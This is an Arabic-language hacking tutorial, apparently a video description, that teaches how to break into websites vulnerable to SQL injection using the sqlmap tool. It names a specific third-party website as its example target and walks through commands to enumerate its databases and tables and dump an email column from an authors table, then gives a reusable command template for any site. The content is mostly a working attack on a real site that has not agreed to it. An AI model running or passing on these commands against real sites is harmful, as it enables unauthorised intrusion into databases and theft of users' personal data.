#SparkyDZ
----------------------------------
ارجوا الإشتراك في القناة + لايك للفديو + كومنتير
--------------------------------
لاتنسى الإعجاب لصفحتنا :D
********************************
[+] درس اليوم يتكلم حول كيفية إختراق المواقع المصابة بثغرة [+]
[+] 3xploit : SQLi ( SQL INJECTION)
[+] Exploit Tool : SQLMAP [+]
****************************
المتطلبات / :
[+] SQLmap [+]
[+] Python 2.7.11 [+] مترجم البايثون
***********************
ملاحظة : انا مثبت مترجم البايثون
***********************
كيفية استعمال الأداة :
[+] SQLmap نذهب الى مسار تثبيت مترجم البايثون ثم ننشأ ملف جديد ونسمية [+]
[+] /SQLmap ننسخ ملفات الأداة الى المسار [+]
[+] cmd نشغل SQLmap بعد نسخ الملفات الخاصة بأداة [+]
ملاحظة عند تشغيل [CMD]
يجب تشغيله كمدير
[+] نكتب الأمر للتنقل بين الملفات cd.. [+]
[+] نذهب الى مسار /SQLmap [+]
******************************************
SQLi تمام بعدما ان اكملنا هذه الخطوة يجب ان يكون لدينا موقع مصاب بثغرة
مثال انا عندي هاذ الموقع المصاب :)
[+] http://www.type-o-tones.com/fonts.php?id=29 [+]
**************
االأوامر المستعملة لإختراق الموقع :
[+] sqlmap.py -u http://www.type-o-tones.com/fonts.php?id=29 --dbs [+]
هذا الأمر يفيد استخراج قواعد البيانات
[+] sqlmap.py -u http://www.type-o-tones.com/fonts.php?id=29 -D db01tot --tables
هذا الأمر يفيد استخراج الجداول
[+] sqlmap.py -u http://www.type-o-tones.com/fonts.php?id=29 -D db01tot -T autors --columns
هذا الأمر يفيد استخراج الخلايا التي توجد داخل الجداول
[+] sqlmap.py -u http://www.type-o-tones.com/fonts.php?id=29 -D db01tot -T autors -C email --dump
****************************
اذا كان عندك موقع هذه هي الأوامر الكلاسيكية :
1- sqlmap.py -u رابط الموقع --dbs
2- sqlmap.py -u رابط الموقع -D اسم قاعدة البيانات --tables
3- sqlmap.py -u رابط الموقع -D اسم قاعدة البيانات -T اسم الجدول --columns
4- sqlmap.py -u رابط الموقع -D اسم قاعدة البيانات -T اسم الجدول -C اسم الخلية --dump
*****************************************



















